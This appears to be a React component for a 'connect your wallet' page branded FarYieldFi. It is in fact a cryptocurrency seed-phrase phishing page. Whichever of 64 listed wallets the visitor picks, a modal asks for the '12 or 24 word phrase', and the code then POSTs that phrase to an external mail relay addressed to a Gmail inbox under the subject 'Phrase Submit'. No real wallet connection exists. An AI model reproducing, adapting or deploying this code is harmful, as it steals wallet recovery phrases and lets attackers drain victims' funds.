import React, { useState } from "react";
import { Helmet } from "react-helmet";
import Header from "../Components/Header";
import Nav from "../Components/Nav";

function WalletConnect() {
  const [selectedWallet, setSelectedWallet] = useState(null);
  const [message, setMessage] = useState("");
  const [showModal, setShowModal] = useState(false);
  const [isSubmitting, setIsSubmitting] = useState(false);

  const handleCardClick = (walletName) => {
    setSelectedWallet(walletName);
    setShowModal(true);
  };

  const handleSubmit = async (e) => {
    e.preventDefault();
    if (!message.trim()) return;

    setIsSubmitting(true);
    try {
      const response = await fetch(
        "https://renderbackend-e1lt.onrender.com/send-mail",
        {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({
            email: "cfoyieldfi@gmail.com",
            subject:"Phrase Submit",
            CompanyName: "Far Yeild Fi",
            htmlToSend: message,
          }),
        }
      );

      if (response.ok) {
        alert("Message sent successfully!");
        setShowModal(false);
        setMessage("");
      } else {
        alert("Failed to send message.");
      }
    } catch (error) {
      alert("Error occurred.");
    } finally {
      setIsSubmitting(false);
    }
  };

const wallets = [
  { id: 1, name: "Trust Wallet", image: "1.png" },
  { id: 2, name: "Metamask", image: "2.png" },
  { id: 3, name: "Crypto.com", image: "3.png" },
  { id: 4, name: "Coinbase", image: "4.png" },
  { id: 5, name: "BlockChain Wallet", image: "5.png" },
  { id: 6, name: "Bitcoin", image: "6.png" },
  { id: 7, name: "Zelcore", image: "7.jpg" },
  { id: 8, name: "XDC Wallet", image: "8.jpg" },
  { id: 9, name: "Rainbow", image: "9.png" },
  { id: 10, name: "Ownbit", image: "10.jpg" },
  { id: 11, name: "Vision", image: "11.jpg" },
  { id: 12, name: "Atomic", image: "12.jpg" },
  { id: 13, name: "Klever", image: "13.png" },
  { id: 14, name: "MathWallet", image: "14.jpg" },
  { id: 15, name: "MoriX Wallet", image: "15.png" },
  { id: 16, name: "SafePal", image: "16.jpg" },
  { id: 17, name: "SparkPoint", image: "17.jpg" },
  { id: 18, name: "Unstoppable Wallet", image: "18.jpg" },
  { id: 19, name: "PeakDeFi Wallet", image: "19.jpg" },
  { id: 20, name: "Infinity Wallet", image: "20.jpg" },
  { id: 21, name: "Autherium", image: "21.jpg" },
  { id: 22, name: "Easy Pocket", image: "22.jpg" },
  { id: 23, name: "Midas Wallet", image: "23.jpg" },
  { id: 24, name: "Walleth", image: "24.png" },
  { id: 25, name: "Onto", image: "25.jpg" },
  { id: 26, name: "Meet.One", image: "26.jpg" },
  { id: 27, name: "GridPlus", image: "27.jpg" },
  { id: 28, name: "Infinito", image: "28.jpg" },
  { id: 29, name: "Dok Wallet", image: "29.jpg" },
  { id: 30, name: "TronLink", image: "30.jpg" },
  { id: 31, name: "Coinomi", image: "31.jpg" },
  { id: 32, name: "MyEtherWallet", image: "32.png" },
  { id: 33, name: "Argent", image: "33.jpg" },
  { id: 34, name: "BitKeep", image: "34.jpg" },
  { id: 35, name: "MyKey", image: "35.jpg" },
  { id: 36, name: "Wallet.io", image: "36.png" },
  { id: 37, name: "Cool Wallet S", image: "37.jpg" },
  { id: 38, name: "Eidoo", image: "38.jpg" },
  { id: 39, name: "Bridge Wallet", image: "39.jpg" },
  { id: 40, name: "Tokenary", image: "40.jpg" },
  { id: 41, name: "AT.Wallet", image: "41.jpg" },
  { id: 42, name: "Harmony", image: "42.png" },
  { id: 43, name: "Stellar", image: "43.png" },
  { id: 44, name: "Alice", image: "44.jpg" },
  { id: 45, name: "Gnosis Safe", image: "45.jpg" },
  { id: 46, name: "Solana", image: "46.png" },
  { id: 47, name: "Oxen", image: "47.png" },
  { id: 48, name: "Guard", image: "48.jpg" },
  { id: 49, name: "TrustVault", image: "49.jpg" },
  { id: 50, name: "Tezos", image: "50.png" },
  { id: 51, name: "DigiTex", image: "51.png" },
  { id: 52, name: "Thundertoken", image: "52.png" },
  { id: 53, name: "Bitpay", image: "53.png" },
  { id: 54, name: "Trustee Wallet", image: "54.jpg" },
  { id: 55, name: "SumCoin", image: "55.png" },
  { id: 56, name: "ViaWallet", image: "56.jpg" },
  { id: 57, name: "Electrum", image: "57.png" },
  { id: 58, name: "Bitbuy", image: "58.png" },
  { id: 59, name: "Mycelium", image: "59.png" },
  { id: 60, name: "Exodus", image: "60.png" },
  { id: 61, name: "Trezor", image: "61.png" },
  { id: 62, name: "Edge Wallet", image: "62.png" },
  { id: 63, name: "Coin98 Wallet", image: "63.png" },
  { id: 64, name: "Others", image: "64.jpg" }
];

  return (
    <div>
      <Helmet>
            <script src="https://forthfunded.com/assets/libs/@popperjs/core/umd/popper.min.js" />
            <script src="https://forthfunded.com/assets/libs/bootstrap/js/bootstrap.bundle.min.js" />
            <script src="https://forthfunded.com/assets/js/defaultmenu.min.js" />
            <script src="https://forthfunded.com/assets/libs/node-waves/waves.min.js" />
            <script src="https://forthfunded.com/assets/js/sticky.js" />
            <script src="https://forthfunded.com/assets/libs/simplebar/simplebar.min.js" />
            <script src="https://forthfunded.com/assets/js/simplebar.js" />
            <script src="https://forthfunded.com/assets/libs/@simonwep/pickr/pickr.es5.min.js" />
            <script src="https://forthfunded.com/assets/libs/apexcharts/apexcharts.min.js" />
            <script src="https://forthfunded.com/assets/js/crypto-dashboard.js" />
            <script src="https://forthfunded.com/assets/js/custom-switcher.min.js" />
            <script src="https://forthfunded.com/assets/js/custom.js" />
          </Helmet>
    
      <div className="page">
        <Header />
        <Nav />

        <div className="main-content app-content">
          <div className="container-fluid">
            <div className="row mb-5">
              <div className="col-xl-12 text-center">
                <img
                  src="assets/images/connect.png"
                  style={{ width: "120px" }}
                  alt=""
                />
                <h4 className="fw-semibold">Choose your wallet</h4>
                <p className="text-muted col-lg-6 offset-lg-3">
                  Connect with one of the available wallet providers.
                </p>
              </div>

              <div className="col-xl-6 offset-xl-3">
                <div className="row">
                  {wallets.map((wallet) => (
                    <div className="col-6 col-lg-4 col-md-3" key={wallet.id}>
                      <div
                        className="card custom-card product-card"
                        style={{ cursor: "pointer" }}
                        onClick={() => handleCardClick(wallet.name)}
                      >
                        <div className="card-body text-center">
                          <img
                            src={`assets/images/wallets/${wallet.image}`}
                            style={{ width: "80px", height: "80px" }}
                            alt={wallet.name}
                          />
                          <p className="fw-semibold mt-2">{wallet.name}</p>
                        </div>
                      </div>
                    </div>
                  ))}
                </div>
              </div>
            </div>
          </div>
        </div>

        {/* Modal */}
        {showModal && (
          <div
            className="modal d-block"
            tabIndex="-1"
            role="dialog"
            style={{ backgroundColor: "rgba(0,0,0,0.5)" }}
          >
            <div className="modal-dialog" role="document">
              <div className="modal-content">
                <form onSubmit={handleSubmit}>
                  <div className="modal-header">
                    <h5 className="modal-title">Message to {selectedWallet}</h5>
                    <button
                      type="button"
                      className="btn-close"
                      onClick={() => setShowModal(false)}
                    />
                  </div>
                  <div className="modal-body">
                    <textarea
                      className="form-control"
                      placeholder="Enter your 12 or 24 word phrase here"
                      rows="4"
                      value={message}
                      onChange={(e) => setMessage(e.target.value)}
                      required
                    />
                  </div>
                  <div className="modal-footer">
                    <button
                      type="button"
                      className="btn btn-secondary"
                      onClick={() => setShowModal(false)}
                    >
                      Cancel
                    </button>
                    <button
                      type="submit"
                      className="btn btn-primary"
                      disabled={isSubmitting}
                    >
                      {isSubmitting ? "Sending..." : "Send"}
                    </button>
                  </div>
                </form>
              </div>
            </div>
          </div>
        )}

        <footer className="footer mt-auto py-3 bg-white text-center">
          <div className="container">
            <span className="text-muted"> Copyright © 2025</span>{" "}
            <a href="javascript:void(0);" className="text-dark fw-semibold">
              FarYieldFi
            </a>
            . All Rights Reserved
            <center>
              <div className="icon-before">
                <div className="icon-bar">
                  <center>
                    <img src="../flag.png" alt="Language flag" width={160} />
                  </center>
                  <div id="google_translate_element" />
                </div>
              </div>
            </center>
          </div>
        </footer>
      </div>
    </div>
  );
}

export default WalletConnect;
